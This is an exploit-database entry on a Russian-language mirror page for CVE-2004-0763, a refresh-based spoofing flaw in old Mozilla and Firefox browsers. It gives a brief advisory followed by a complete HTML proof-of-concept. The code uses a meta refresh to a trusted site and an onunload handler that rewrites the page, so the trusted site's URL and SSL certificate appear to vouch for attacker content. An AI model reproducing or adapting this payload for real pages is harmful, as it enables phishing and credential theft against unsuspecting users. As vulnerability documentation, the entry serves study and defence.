- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24312
- Проверка EDB
-
- Пройдено
- Автор
- E.KELLINIS
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2004-0763
- Дата публикации
- 2004-07-26
Mozilla Browser 0.8/0.9/1.x - Refresh Security Property Spoofing
HTML:
source: https://www.securityfocus.com/bid/10796/info
Mozilla and Firefox may permit malicious Web pages to spoof security properties of a trusted site.
An attacker can exploit this issue to spoof the URI and SSL certificate of a site trusted by an unsuspecting user. The attacker can then use this spoofing to steal sensitive or private information, facilitating phishing attacks
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>- Источник
- www.exploit-db.com
